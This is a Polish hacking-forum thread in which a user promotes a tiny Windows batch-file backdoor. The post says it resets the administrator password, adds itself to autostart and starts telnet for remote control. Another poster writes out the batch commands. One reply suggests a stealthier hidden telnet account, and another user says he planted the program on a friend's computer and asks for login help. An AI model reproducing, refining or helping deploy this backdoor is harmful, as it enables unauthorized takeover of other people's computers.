!! smaller 1.0 !!Najmniejszy backdoor!!244bajty!!:D:D!!

lorenzo

Użytkownik
Dołączył
Listopad 2, 2003
Posty
12
Panie i panowie przedstawiam wam mini backdorka smaller ver.1.0

www.smaller.friko.pl

Klient to program telnet "start>>uruchom>>telnet".
Trojan ten zmienia hasło administratora na hasło lorenzo
dopisuje się do autostartu i odpala port 23-co powoduje że mamy pełen dostęp do kompa
<
.Jest nie wykrywalny przez żadnego antywira.Kod można zmieniać dowoli
<
.Jest napisany w bacie.I jest zajebiscie prosty i pomysłowy.Zajmuje 244bajty(0,224kb)-tyle co trojany pisane w asmie
<
!!Ale jak to sie mówi:"Małe jest piękne ale duże wiecej potrafi.."tak i tu jest jedna wada...Trojan działa tylko pod Windows Xp,2000,2003serwer i chyba Nt.Uwada nie działa pod win3.11,95,98 i me=
=
<
Ponieważ inne windowsy<xp nie mają tych funkcji(winapi mają cieńkie
<
).Funkcje jakie oferuje ten trojan to wszystko to co można robić pod dosem,czyli odpalanie aplikacji,przegladanie plikow,kasowanie,robienie,grzebianie w rejestrze windows itp.
smile.gif

Teraz pracuje nad podobnym trojanem qtóry bedzie działał pod linuxem
(teraz w shellcode będe pisał dla odmiany
<
).HEhe to chyba wszystko
smile.gif
.
Jak coś zmienicie w kodzie i będzie to coś ciekawego to zarzućcie mi tym kawałkiem kodu
smile.gif
([email protected]). Pozdrawiam!!
smile.gif
 

LAME-R

Użytkownik
Dołączył
Listopad 6, 2003
Posty
228
Link nie działa, załóż sobie na jakimś lepszym koncie od friko. (Polecam Lycos).
 

lorenzo

Użytkownik
Dołączył
Listopad 2, 2003
Posty
12
ok naprawiłem :p

jush działa sprawdz teraz:p.Sorry za fal start ale to wina friko.pl
<
. Jush wszystko gra tera .
smile.gif
 

s@S@n

Użytkownik
Dołączył
Marzec 2, 2004
Posty
112
Hahahaha
smile.gif
rozśmieszyłeś mnie stary to jest cudeńko hahaah lol lol
 

Chochlik

Użytkownik
Dołączył
Styczeń 10, 2003
Posty
391
S@s@n nie czepiaj sie, moze dla niektorych to jest oczywista sprawa, ale innym moze sie przydac, jak ja napisalem o moim dwulinijkowym downladerze w delphi ktory mial 15 kb to mnie nie wysmiewales :]
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
No Wojass, nie przesadzaj bo różnice konstrukcyjne są kolosalne
<
A tak poważnie, to nie śmiejcie się, bo się starał
smile.gif
- zawsze coś ;-), tylko nie rozumiem, czemu tych kilku linijek nie dało się wkleić na forum??
 

Chochlik

Użytkownik
Dołączył
Styczeń 10, 2003
Posty
391
Dobra, lorezno teraz pracuje zeby dzialalo za natem i uzywalo protokolu GG
<
Albo zeby kontrolowac to umyslem
<
 

Marflo

Użytkownik
Dołączył
Maj 12, 2004
Posty
84
No nie śmiejcie sie
<
Przynajmniej zrobil sam jakiegos trojana, a nie tylko czekal az Achates download otworzy i bedzie sobie mogl jakiegos sciagnac
<
 

Ccobra

Użytkownik
Dołączył
Maj 12, 2004
Posty
91
net user administrator lorenzo

cd c:documents and settingsall usersmenu startprogramyautostart

echo>>"gadugadu.bat" net start telnet

echo>>"gadugadu.bat" net user administrator lorenzo

net start telnet

=====
Popraw mnie jeśli się mylę, Pliki wsadowe niedają za dużo opcji i poraz pierwszy spotykam sięz trojanem który jest napisany w bacie, Teraz tak, mówisz że kopiuje się do autostartu, to co za problem go usunąć F8. Na podstawie tego kodu powiedz mi gdzie kopiuje się do klasycznej ścieżki w rejestrze bo chyba też za głupi jestem bo nie widzę tego.
I na koniec jakie tak naprawdę masz opcje ? bo ani screenu itp, możesz przeglądać, kasować kopiować pliki pod teln. i co jeszcze ?
Proponuję zabrać się za jakiś konkretniejszy język i napisać potężniejszego trojanka
smile.gif
Powodzenia
Ps. Czy ten program można nazwać trojanem ?
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
nie programem do zdalnej administracji ....
<

nie no nie ma wpsiu do rejestru z tego co widze ...
smile.gif

fajny pomysl z bacikiem ...
smile.gif

pozdrawiam ...
 

s@S@n

Użytkownik
Dołączył
Marzec 2, 2004
Posty
112
Originally posted by Marflo
No nie śmiejcie sie
<
Przynajmniej zrobil sam jakiegos trojana, a nie tylko czekal az Achates download otworzy i bedzie sobie mogl jakiegos sciagnac
<

Stary jakieś 60% wypowiadających się tu ludzi zrobiła coś własnego.
 

lorenzo

Użytkownik
Dołączył
Listopad 2, 2003
Posty
12
hehe spodziewałem się tego :p

No jak widać niektórzy ludzie się znają, niektórzy poprostu nie
smile.gif
.Widać że code tego trojana
<
bądz też "aplikacji do zdalnej administracji" jest obskórny:p, a wy wymagacie
<
z pistoletu żeby był karabinem:p(buhahaha).Mogę napisać wam na luzaku trojana fullwypas z opcjami takimi jak ma cafeini lub jeszcze lepszymi ale poprostu nie widziałem sensu żeby na nowo odkrywać amerykę, tak jak to robią co poniektórzy i się cwelą że co to oni nie są
<
.Ja wam pokazałem nowość
<
i spodziewałem się że 3/4 z tego to będzie podniecać się że można lepiej i wogóle
smile.gif
<
(to czemu sami tego lepiej nie pokazaliście wczesniej lol lol lol lol lol lol ;P ).No ide pisać dalej coś ciekawszego
<
.Piszcie dalej jak coś
smile.gif
-fajnie się to ogółem czyta
smile.gif

i dzięki za odzew,że ktoś jest chociaż zainteresowany tym trojanem
smile.gif
.
Pozdrawiam
smile.gif
 

rywin

Użytkownik
Dołączył
Kwiecień 22, 2003
Posty
237
No moze z nazwaniem tego trojanem przesadziles ale gut idea.
Proponuje nie zmieniac hasla admina bo taki komp dlugo nie postoi w sieci bo koles sie kapnie ze cos jest nie tak. A w zamian proponuje stwozyc nowa grupe o nazwie -> TelnetClients -> nowego_usera -> z grupy uzytkownicy usunac nowego_usera -> dodac nowego_usera do grupy TelnetClients
Jak ktos nie wie po co, to pytac .
 

SKORPION

Użytkownik
Dołączył
Maj 21, 2004
Posty
2
mam pytanie jest wszystko wpożądku wpisuje nazwe użytkownika [administrator] ale niemoge wpisać hasła coś sie blokuje i nieidzie nic napisać co jest grane
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
Zdecyduj się SKORPION bo taki sam post napisałeś w topicu o wykrywaczu. Gdzie niby to wpisujesz bo nic z tego się nie da skumać??
 

SKORPION

Użytkownik
Dołączył
Maj 21, 2004
Posty
2
HODZI OTO, ŻE PROGRAM WŻUCIŁEM NA KOMPA KUMPLA ZA PIERWSZYM RAZEM DZIAŁAŁO, ALE TERAS UDA MISIE POŁĄCZYĆ WPISAĆ NAZWE UŻYTKOWNIKA I NIEMOGE WPISAĆ HASŁA
 

Knexus

Użytkownik
Dołączył
Lipiec 2, 2003
Posty
118
Originally posted by SKORPION
HODZI OTO, ŻE PROGRAM WŻUCIŁEM NA KOMPA KUMPLA ZA PIERWSZYM RAZEM DZIAŁAŁO, ALE TERAS UDA MISIE POŁĄCZYĆ WPISAĆ NAZWE UŻYTKOWNIKA I NIEMOGE WPISAĆ HASŁA

nie wiem czy to o to chodzi ale jak wpisujesz password to nie widac tego co piszesz
<
forma zabezpieczenia
<
 
Do góry Bottom